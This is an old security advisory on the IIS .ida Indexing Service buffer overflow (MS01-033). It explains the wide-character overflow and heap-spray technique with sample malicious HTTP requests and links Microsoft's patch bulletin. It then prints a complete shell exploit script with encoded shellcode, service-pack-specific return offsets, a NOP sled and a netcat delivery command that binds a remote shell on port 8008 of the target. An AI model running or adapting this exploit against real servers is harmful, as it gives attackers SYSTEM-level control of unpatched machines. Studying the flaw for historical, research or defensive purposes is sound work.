COMMAND
IIS
SYSTEMS AFFECTED
IIS 4, 5, 6beta
PROBLEM
Marc Maiffret found following. There exists a remote buffer
overflow vulnerability in all versions of Microsoft Internet
Information Services (IIS) Web server software.
The vulnerability lies within the code that allows a Web server to
interact with Microsoft Indexing Service functionality. The
vulnerable Indexing Service ISAPI filter is installed by default
on all versions of IIS. The problem lies in the fact that the
.ida (Indexing Service) ISAPI filter does not perform proper
"bounds checking" on user inputted buffers and therefore is
susceptible to a buffer overflow attack.
Attackers that leverage the vulnerability can, from a remote
location, gain full SYSTEM level access to any server that is
running a default installation of Windows NT 4.0, Windows 2000,
or Windows XP and using Microsoft’s IIS Web server software.
With system-level access, an attacker can perform any desired
action, including installing and running programs, manipulating
Web server databases, adding, changing or deleting files and Web
pages, and more.
Riley Hassell was at it again one day working to further advance
eEye's CHAM (Common Hacking Attack Methods) technology so that
Retina could better search for unknown vulnerabilities in
software and so that SecureIIS could better protect from unknown
IIS vulnerabilities. After a few hours of running some custom
CHAM auditing code one of our Web servers in our lab eventually
came to a halt as the IIS Web server process had suddenly died.
eEye investigated the vulnerability further and found that the
.ida ISAPI filter was susceptible to a typical buffer overflow
attack. Example:
GET /NULL.ida?[buffer]=X HTTP/1.1
Host: werd
Where [buffer] is aprox. 240 bytes.
The Exploit, as taught by Ryan "Overflow Ninja" Permeh: This
buffer overflows in a wide character transformation operation.
It takes the ASCII (1 byte per char) input buffer and turns it
into a wide char/unicode string (2 bytes per char) byte string.
For instance, a string like AAAA gets transformed into
\0A\0A\0A\0A. In this transformation, buffer lengths are not
checked and this can be used to cause EIP to be overwritten.
This sounds like any normal overflow to date, however there are a
few sticking points in doing anything useful with this. First,
you transform 2 bytes into 4, 2 of which you have no control
over. This would be a bad situation, but not impossible to
exploit. However, the 2 bytes that you do not have control over
happen to be nulls. Basically, we need to take this 2 byte string
and somehow get it to point to our code. Traditionally, we use
our overwritten EIP to jump to a call esp, or jmp esp, jumping
back to code we have positioned on the stack to implement whatever
it is our shellcode would like to do. In this case, however,
there is a problem.
GET /a.ida?[Ax240]=x HTTP/1.0
The above example overwrites EIP with 0x00410041. Again,
traditionally, we insert our shellcode in the same buffer we
overflow, however we run into the problem that then our code
would also face the same expansion that our EIP bytes face. This
makes writing shellcode a horrible pain. There are two methods
of doing this:
1. custom shellcode: It might be possible to write shellcode that
works fine with NULL byes every other byte. It would probably
have to be very simple, but this could be possible.
2. encode: You could probably write a decoder that takes a string
of 0x0041 and rewrites it on the stack into actual single byte
code. This would have to be written completely in 0x00bb
opcodes, most likely a challenge in itself (similar to the
above custom shellcode, but only a decoder would need to be
written).
This would, of course only be possible if we could find a point
in memory that we could reach using only 0x00aa00bb. This gives
us only about 65k spots in memory to look for jump bytes, a
pretty dismal situation.
eEye got lucky using this method. They were basically limited to
a very very small range of memory in which to find jump bytes.
They thought they were losing the battle until we realized that
IIS/ISAPI uses 0x00aabbcc as its memory range for allocated heap.
They developed a spray technique in an attempt to push enough
data into the heap so that the bytes we require will be there
when we need to jump to them.
For instance, in Windows 2000 Service Pack 1, eEye noticed that
they had request bytes at around 0x0042deaa. Since the closest
they could get to this was 0x00430001 (by overflowing with C%01
at the end of our overflow string. This offered an intriguing
possibility -- perhaps we could push more stuff into a request,
causing more heap memory to be used, pushing our request closer
to where we want to be.
GET /a.ida?[Cx240]=x HTTP/1.1
Host: the.victim.com
eEye: [Cx10,000][shellcode]
Now, we overflow the EIP with 0x00430043. With our new much
larger request, 0x00430043 happens to be inside the large C
buffer we setup. This acts as a slide in our code, executing
down to our shellcode.
With this technique of forceful heap violation, everything is
relative to what is there to begin with. eEye noticed that in
any situation, we found 4-5 different copies of our requests in
the 0x00aabbcc memory range. This means that perhaps 0x430043 is
not the best spot in memory, however it is the one we chose in
our forthcoming sample exploit (the exploit we will provide only
executes file writing; eEye provided Microsoft with shell-binding
code but will not publicly release this code). The other potential
problem with this attack is that different systems may have
different heap usages. In internal tests, eEye noticed that
heap usage differed depending on which ISAPI extensions were
enabled at any time. Also, requests that cause faults handled by
exception handlers that do not free their heaps may cause certain
parts of the heap to become unusable, causing those spots to not
be reused. This is not a problem for Windows 2000 because it is
nice enough to restart itself (giving us a nice clean heap to
work with). Windows XP appears to act similarly, however we did
not focus our research with this beta OS. This is, however,
potentially a problem with NT 4, which will crash if exploited
incorrectly. Again, like all other IIS overflows, this attack is
not logged, causing only a fault in IIS and crashing it.
All of the technical talk aside, we do have working exploits for
Windows NT 4.0, Windows 2000 and Windows XP systems.
As stated earlier, all versions of Microsoft's IIS Web server
software are vulnerable to this flaw. This includes Windows XP
beta, Microsoft's next-generation Operating System and the
version of IIS that is included with it. Microsoft is taking the
necessary steps to patch Windows XP before the final version
ships to customers.
Discovery credit goes to Riley Hassell and Ryan Permeh for
exploit. Here is another try of the exploit code:
#!/bin/sh
# .ida nasty exploit
# mat@hacksware.com,mat@monkey.org
# http://monkey.org/~mat
#
# If this exploit succeeds, you can get into the machine through port 8008
# shellcode generated by DeepZone generator
# I only tested this code under W2k Korean Version, so the offset value may vary through systems, you can get the offset value with WinDbg tool included in Windows SDK
#
# How to get the offset:
# 1. start windbg and attach to inetinfo.exe process. and go(F5)
# 2. using this script attack the test machine
# 3. if the offset in this script is not valid, then inetinfo.exe will be got break.
# 4. you can search the shellcode position with following command
# s 10000 Lfffff 0x68 0x5e 0x56 0xc3 0x90
# 5. if the shellcode position is 0xaabbccdd
# then you can change the %u...%u...to %uccdd%uaabb
target=$1
SHELLCODE=`printf "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9\x99\x32\x5e\x1c\xbc!
\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99\xe!
b\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x!
34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xa9\x66\x0c\xd6\xbc\xd9\x99\x70\x20\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0\xed\xfc\xdf\xf0\xf5\xfc\!
x99\xca\xf5\xfc\xfc\xe9\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90"`
#for w2k no sp:
#GET_LINE="GET /test.ida?`perl -e 'print "N"x230'`%u0101%u00b5%u0101%u00b5%u0101%u00b5%u0101%u00b5=x HTTP/1.0"
#for w2k sp2:
GET_LINE="GET /test.ida?`perl -e 'print "N"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=x HTTP/1.0"
nc $target 80 <<EOF
`echo $GET_LINE`
yahoo: `perl -e 'print "\x90"x11800'`$SHELLCODE
EOF
SOLUTION
Check out Microsoft Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp